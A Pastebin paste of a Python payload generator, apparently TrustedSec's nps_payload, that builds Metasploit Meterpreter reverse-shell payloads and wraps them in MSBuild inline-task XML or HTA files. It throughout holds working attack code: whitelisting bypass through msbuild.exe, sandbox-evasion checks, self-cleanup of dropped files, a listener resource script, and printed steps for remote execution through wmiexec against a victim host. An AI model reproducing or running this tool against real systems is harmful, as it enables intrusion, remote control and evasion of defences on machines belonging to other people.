API tools faq
paste
Guest User

Untitled

a guest
Feb 14th, 2020
118
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.39 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2.  
  3. # Written by Larry Spohn (@Spoonman1091)
  4. # Payload written by Ben Mauch (@Ben0xA) aka dirty_ben
  5. # TrustedSec, LLC
  6. # https://www.trustedsec.com
  7.  
  8. from __future__ import print_function
  9. import os
  10. import sys
  11. import netifaces as nic
  12. import pexpect
  13. import base64
  14.  
  15. class bcolors:
  16. BLUE = '\033[94m'
  17. GREEN = '\033[92m'
  18. WARNING = '\033[93m'
  19. WHITE = '\033[97m'
  20. ERROR = '\033[91m'
  21. ENDC = '\033[0m'
  22. BOLD = '\033[1m'
  23. UNDERLINE = '\033[4m'
  24.  
  25. listener_ip = "127.0.0.1"
  26.  
  27. # Configure for auto detection of local IP Address
  28. local_interface = "ens33"
  29.  
  30. try:
  31. raw_input # Python 2
  32. except NameError:
  33. raw_input = input # Python 3
  34.  
  35. # Enumerate the local IP assigned to "iface"
  36. def get_local_ip(iface):
  37. try:
  38. nic.ifaddresses(iface)
  39. local_ip = nic.ifaddresses(iface)[2][0]['addr']
  40. return local_ip
  41. except:
  42. pass
  43.  
  44. def generate_msfvenom_payload(msf_payload):
  45. global listener_ip
  46.  
  47. if (listener_ip == "127.0.0.1"):
  48. local_ip = get_local_ip(local_interface)
  49. listener_ip = raw_input("Enter Your Local IP Address (%s): " % local_ip) or local_ip
  50.  
  51. # Get listern port from user
  52. msf_port = raw_input("Enter the listener port (443): ") or 443
  53.  
  54. # Generate PSH payload
  55. print(bcolors.BLUE + "[*]" + bcolors.ENDC + " Generating PSH Payload...")
  56. output = pexpect.run("msfvenom -p %s LHOST=%s LPORT=%s --arch x86 --platform win -f psh -o msf_payload.ps1" % (msf_payload,listener_ip,msf_port))
  57.  
  58. # Generate resource script
  59. print(bcolors.BLUE + "[*]" + bcolors.ENDC + " Generating MSF Resource Script...")
  60. msf_resource_file = open("msbuild_nps.rc", "a")
  61. payload_listener = "\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j -z" % (msf_payload, listener_ip, msf_port)
  62. msf_resource_file.write(payload_listener)
  63. msf_resource_file.close()
  64.  
  65. def encode_pshpayload(payload_file):
  66. global psh_payload
  67.  
  68. psh_file = open(payload_file, "r")
  69. psh_payload = psh_file.read() + "for (;;){\n Start-sleep 60\n}"
  70. psh_payload = base64.b64encode(psh_payload.encode('utf-8'))
  71. psh_file.close()
  72. return psh_payload
  73.  
  74. def generate_msbuild_nps_msf_payload():
  75. global psh_payload
  76. global listener_ip
  77.  
  78. # Delete old resource script
  79. if os.path.exists("msbuild_nps.rc"):
  80. os.remove("msbuild_nps.rc")
  81.  
  82. # Initilize new resource script
  83. msf_resource_file = open("msbuild_nps.rc", "a")
  84. msf_resource_file.write("use multi/handler")
  85. msf_resource_file.close()
  86.  
  87. # Display options to the user
  88. print("\nPayload Selection:")
  89. print("\n\t(1)\twindows/meterpreter/reverse_tcp")
  90. print("\t(2)\twindows/meterpreter/reverse_http")
  91. print("\t(3)\twindows/meterpreter/reverse_https")
  92. print("\t(4)\tCustom PS1 Payload")
  93.  
  94. options = {1: "windows/meterpreter/reverse_tcp",
  95. 2: "windows/meterpreter/reverse_http",
  96. 3: "windows/meterpreter/reverse_https",
  97. 4: "custom_ps1_payload"
  98. }
  99.  
  100. # Generate payload
  101. try:
  102. msf_payload = input("\nSelect payload: ")
  103. if (options.get(msf_payload) == "custom_ps1_payload"):
  104. custom_ps1 = raw_input("Enter the location of your custom PS1 file: ")
  105. encode_pshpayload(custom_ps1)
  106. else:
  107. generate_msfvenom_payload(options.get(msf_payload))
  108. encode_pshpayload("msf_payload.ps1")
  109.  
  110. except KeyError:
  111. pass
  112.  
  113.  
  114. # Create msbuild_nps.xml
  115. msbuild_nps_file = open("msbuild_nps.xml", "w")
  116. msbuild_nps_file.write("""<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  117. <!-- This inline task executes c# code. -->
  118. <!-- C:\Windows\Microsoft.NET\Framework64\\v4.0.30319\msbuild.exe nps.xml -->
  119. <!-- Original MSBuild Author: Casey Smith, Twitter: @subTee -->
  120. <!-- NPS Created By: Ben Ten, Twitter: @ben0xa -->
  121. <!-- License: BSD 3-Clause -->
  122. <Target Name="npscsharp">
  123. <nps />
  124. </Target>
  125. <UsingTask
  126. TaskName="nps"
  127. TaskFactory="CodeTaskFactory"
  128. AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
  129. <Task>
  130. <Reference Include="System.Management.Automation" />
  131. <Code Type="Class" Language="cs">
  132. <![CDATA[
  133. using System;
  134. using System.Collections.ObjectModel;
  135. using System.Management.Automation;
  136. using System.Management.Automation.Runspaces;
  137. using Microsoft.Build.Framework;
  138. using Microsoft.Build.Utilities;
  139. public class nps : Task, ITask
  140. {
  141. public override bool Execute()
  142. {
  143. string cmd = "%s";
  144. PowerShell ps = PowerShell.Create();
  145. ps.AddScript(Base64Decode(cmd));
  146. Collection<PSObject> output = null;
  147. try
  148. {
  149. output = ps.Invoke();
  150. }
  151. catch(Exception e)
  152. {
  153. Console.WriteLine("Error while executing the script.\\r\\n" + e.Message.ToString());
  154. }
  155. if (output != null)
  156. {
  157. foreach (PSObject rtnItem in output)
  158. {
  159. Console.WriteLine(rtnItem.ToString());
  160. }
  161. }
  162. return true;
  163. }
  164. public static string Base64Encode(string text) {
  165. return System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(text));
  166. }
  167. public static string Base64Decode(string encodedtext) {
  168. return System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(encodedtext));
  169. }
  170. }
  171. ]]>
  172. </Code>
  173. </Task>
  174. </UsingTask>
  175. </Project>""" % psh_payload)
  176.  
  177. print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Metasploit resource script written to msbuild_nps.rc")
  178. print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Payload written to msbuild_nps.xml")
  179. print("\n1. Run \"" + bcolors.WHITE + "msfconsole -r msbuild_nps.rc" + bcolors.ENDC + "\" to start listener.")
  180. print("2. Choose a Deployment Option (a or b): - See README.md for more information.")
  181. print(" a. Local File Deployment:\n" + bcolors.WHITE + " - %windir%\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe <folder_path_here>\\msbuild_nps.xml" + bcolors.ENDC)
  182. print(" b. Remote File Deployment:\n" + bcolors.WHITE + " - wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe \\\\<attackerip>\\<share>\\msbuild_nps.xml" + bcolors.ENDC)
  183. print("3. Hack the Planet!!")
  184.  
  185. sys.exit(0)
  186.  
  187. def generate_msbuild_nps_msf_hta_payload():
  188. global psh_payload
  189. global listener_ip
  190.  
  191. psh_payload = ""
  192. psh_payloads = ""
  193. payload_count = 1
  194.  
  195.  
  196. # Delete old resource script
  197. if os.path.exists("msbuild_nps.rc"):
  198. os.remove("msbuild_nps.rc")
  199.  
  200. # Initilize new resource script
  201. msf_resource_file = open("msbuild_nps.rc", "a")
  202. msf_resource_file.write("use multi/handler")
  203. msf_resource_file.close()
  204.  
  205. while True:
  206. # Display options to the user
  207. print("\nPayload Selection:")
  208. print("\n\t(1)\twindows/meterpreter/reverse_tcp")
  209. print("\t(2)\twindows/meterpreter/reverse_http")
  210. print("\t(3)\twindows/meterpreter/reverse_https")
  211. print("\t(4)\tCustom PS1 Payload")
  212. print("\t(99)\tFinished")
  213.  
  214. options = {1: "windows/meterpreter/reverse_tcp",
  215. 2: "windows/meterpreter/reverse_http",
  216. 3: "windows/meterpreter/reverse_https",
  217. 4: "custom_ps1_payload",
  218. 99: "finished"
  219. }
  220.  
  221. # Generate payloads
  222. try:
  223. msf_payload = input("\nSelect multiple payloads. Enter 99 when finished: ")
  224. if (options.get(msf_payload) == "finished"):
  225. break
  226. elif (options.get(msf_payload) == "custom_ps1_payload"):
  227. custom_ps1 = raw_input("Enter the location of your custom PS1 file: ")
  228. encode_pshpayload(custom_ps1)
  229. else:
  230. generate_msfvenom_payload(options.get(msf_payload))
  231. encode_pshpayload("msf_payload.ps1")
  232. os.remove("msf_payload.ps1")
  233.  
  234. # Generate payload vbs array string
  235. if (payload_count == 1):
  236. psh_payloads = "\"" + psh_payload + "\""
  237. else:
  238. psh_payloads += ", _\n\t\"" + psh_payload + "\""
  239. payload_count += 1
  240.  
  241. except KeyError:
  242. pass
  243.  
  244. # Create msbuild_nps.xml
  245. msbuild_nps_file = open("msbuild_nps.hta", "w")
  246. msbuild_nps_file.write("""<script language=vbscript>
  247. On Error Resume Next
  248. Set objFSO = CreateObject("Scripting.FileSystemObject")
  249. Set objShell = CreateObject("WScript.Shell")
  250. objTemp = objShell.ExpandEnvironmentStrings("%%TEMP%%")
  251. objWindir = objShell.ExpandEnvironmentStrings("%%windir%%")
  252. Set objWMIService = GetObject("winmgmts:\\\\.\\root\CIMV2")
  253. arrUnicorns = Array(%s)
  254. ' Get logical processor count
  255. Set colComputerSystem = objWMIService.ExecQuery("SELECT * FROM Win32_ComputerSystem")
  256. For Each objComputerSystem In colComputerSystem
  257. objProcessorCount = objComputerSystem.NumberofLogicalProcessors
  258. Next
  259. ' Only run if system has more than 1 processor
  260. ' https://www.trustedsec.com/may-2015/bypassing-virtualization-and-sandbox-technologies/
  261. If objProcessorCount > 1 Then
  262. ' Sleep 60 seconds
  263. ' https://www.sans.org/reading-room/whitepapers/malicious/sleeping-sandbox-35797
  264. objShell.Run "%%COMSPEC%% /c ping -n 60 127.0.0.1>nul", 0, 1
  265. For Each objUnicorn in arrUnicorns
  266. x = x + 1
  267. ' Create MSBuild XML File
  268. CreateMSBuildXML objUnicorn, x
  269. ' Execute resource(x).xml using msbuild.exe and nps
  270. objShell.Run objWindir & "\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe %%TEMP%%\\resource" & x & ".xml", 0
  271. Next
  272. ' Cleanup
  273. For y = 1 To x
  274. Do While objFSO.FileExists(objTemp & "\\resource" & y & ".xml")
  275. objShell.Run "%%COMSPEC%% /c ping -n 10 127.0.0.1>nul", 0, 1
  276. objFSO.DeleteFile(objTemp & "\\resource" & y & ".xml")
  277. Loop
  278. Next
  279. End If
  280. window.close()
  281. ' Creates XML configuration files in the %%TEMP%% directory
  282. Function CreateMSBuildXML(objUnicorn, x)
  283. msbuildXML = "<Project ToolsVersion=" & CHR(34) & "4.0" & CHR(34) & " xmlns=" & CHR(34) & "http://schemas.microsoft.com/developer/msbuild/2003" & CHR(34) & ">" & vbCrLf &_
  284. " <!-- This inline task executes c# code. -->" & vbCrLf &_
  285. " <!-- C:\Windows\Microsoft.NET\Framework64\\v4.0.30319\msbuild.exe nps.xml -->" & vbCrLf &_
  286. " <!-- Original MSBuild Author: Casey Smith, Twitter: @subTee -->" & vbCrLf &_
  287. " <!-- NPS Created By: Ben Ten, Twitter: @ben0xa -->" & vbCrLf &_
  288. " <!-- License: BSD 3-Clause -->" & vbCrLf &_
  289. " <Target Name=" & CHR(34) & "npscsharp" & CHR(34) & ">" & vbCrLf &_
  290. " <nps />" & vbCrLf &_
  291. " </Target>" & vbCrLf &_
  292. " <UsingTask" & vbCrLf &_
  293. " TaskName=" & CHR(34) & "nps" & CHR(34) & "" & vbCrLf &_
  294. " TaskFactory=" & CHR(34) & "CodeTaskFactory" & CHR(34) & "" & vbCrLf &_
  295. " AssemblyFile=" & CHR(34) & "C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" & CHR(34) & " >" & vbCrLf &_
  296. " <Task>" & vbCrLf &_
  297. " <Reference Include=" & CHR(34) & "System.Management.Automation" & CHR(34) & " />" & vbCrLf &_
  298. " <Code Type=" & CHR(34) & "Class" & CHR(34) & " Language=" & CHR(34) & "cs" & CHR(34) & ">" & vbCrLf &_
  299. " <![CDATA[" & vbCrLf &_
  300. "" & vbCrLf &_
  301. " using System;" & vbCrLf &_
  302. " using System.Collections.ObjectModel;" & vbCrLf &_
  303. " using System.Management.Automation;" & vbCrLf &_
  304. " using System.Management.Automation.Runspaces;" & vbCrLf &_
  305. " using Microsoft.Build.Framework;" & vbCrLf &_
  306. " using Microsoft.Build.Utilities;" & vbCrLf &_
  307. "" & vbCrLf &_
  308. " public class nps : Task, ITask" & vbCrLf &_
  309. " {" & vbCrLf &_
  310. " public override bool Execute()" & vbCrLf &_
  311. " {" & vbCrLf &_
  312. " string cmd = " & CHR(34) & objUnicorn & CHR(34) & ";" & vbCrLf &_
  313. " " & vbCrLf &_
  314. " PowerShell ps = PowerShell.Create();" & vbCrLf &_
  315. " ps.AddScript(Base64Decode(cmd));" & vbCrLf &_
  316. "" & vbCrLf &_
  317. " Collection<PSObject> output = null;" & vbCrLf &_
  318. " try" & vbCrLf &_
  319. " {" & vbCrLf &_
  320. " output = ps.Invoke();" & vbCrLf &_
  321. " }" & vbCrLf &_
  322. " catch(Exception e)" & vbCrLf &_
  323. " {" & vbCrLf &_
  324. " Console.WriteLine(" & CHR(34) & "Error while executing the script.\\r\\n" & CHR(34) & " + e.Message.ToString());" & vbCrLf &_
  325. " }" & vbCrLf &_
  326. " if (output != null)" & vbCrLf &_
  327. " {" & vbCrLf &_
  328. " foreach (PSObject rtnItem in output)" & vbCrLf &_
  329. " {" & vbCrLf &_
  330. " Console.WriteLine(rtnItem.ToString());" & vbCrLf &_
  331. " }" & vbCrLf &_
  332. " }" & vbCrLf &_
  333. " return true;" & vbCrLf &_
  334. " }" & vbCrLf &_
  335. "" & vbCrLf &_
  336. " public static string Base64Encode(string text) {" & vbCrLf &_
  337. " return System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(text));" & vbCrLf &_
  338. " }" & vbCrLf &_
  339. "" & vbCrLf &_
  340. " public static string Base64Decode(string encodedtext) {" & vbCrLf &_
  341. " return System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(encodedtext));" & vbCrLf &_
  342. " }" & vbCrLf &_
  343. " }" & vbCrLf &_
  344. " ]]>" & vbCrLf &_
  345. " </Code>" & vbCrLf &_
  346. " </Task>" & vbCrLf &_
  347. " </UsingTask>" & vbCrLf &_
  348. "</Project>"
  349. Set objFile = objFSO.CreateTextFile(objTemp & "\\resource" & x & ".xml", True)
  350. objFile.WriteLine(msbuildXML)
  351. objFile.Close
  352. End Function
  353. </script>""" % psh_payloads)
  354.  
  355. print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Metasploit resource script written to msbuild_nps.rc")
  356. print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Payload written to msbuild_nps.hta")
  357. print("\n1. Run \"" + bcolors.WHITE + "msfconsole -r msbuild_nps.rc" + bcolors.ENDC + "\" to start listener.")
  358. print("2. Deploy hta file to web server and navigate from the victim machine.")
  359. print("3. Hack the Planet!!")
  360.  
  361. sys.exit()
  362.  
  363. # Exit Program
  364. def quit():
  365. sys.exit(0)
  366.  
  367.  
  368. # Main guts
  369. def main():
  370. print("""
  371. ( (
  372. ) ( )\ ) )\ )
  373. ( ` ) ( ` ) ( /( )\ )((_)( ( /( (()/(
  374. )\ ) /(/( )\ /(/( )(_)|()/( _ )\ )(_)) ((_)
  375. _(_/(((_)_\((_) ((_)_\((_)_ )(_)) |((_)((_)_ _| |
  376. | ' \)) '_ \|_-< | '_ \) _` | || | / _ \/ _` / _` |
  377. |_||_|| .__//__/____| .__/\__,_|\_, |_\___/\__,_\__,_|
  378. |_| |_____|_| |__/
  379. v1.03
  380. """)
  381.  
  382. while(1):
  383. # Display options to the user
  384. print("\n\t(1)\tGenerate msbuild/nps/msf payload")
  385. print("\t(2)\tGenerate msbuild/nps/msf HTA payload")
  386. print("\t(99)\tQuit")
  387.  
  388. options = {1: generate_msbuild_nps_msf_payload,
  389. 2: generate_msbuild_nps_msf_hta_payload,
  390. 99: quit,
  391. }
  392. try:
  393. task = input("\nSelect a task: ")
  394. options[task]()
  395. except KeyError:
  396. pass
  397.  
  398.  
  399. # Standard boilerplate to call the main() function
  400. if __name__ == '__main__':
  401. main()
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!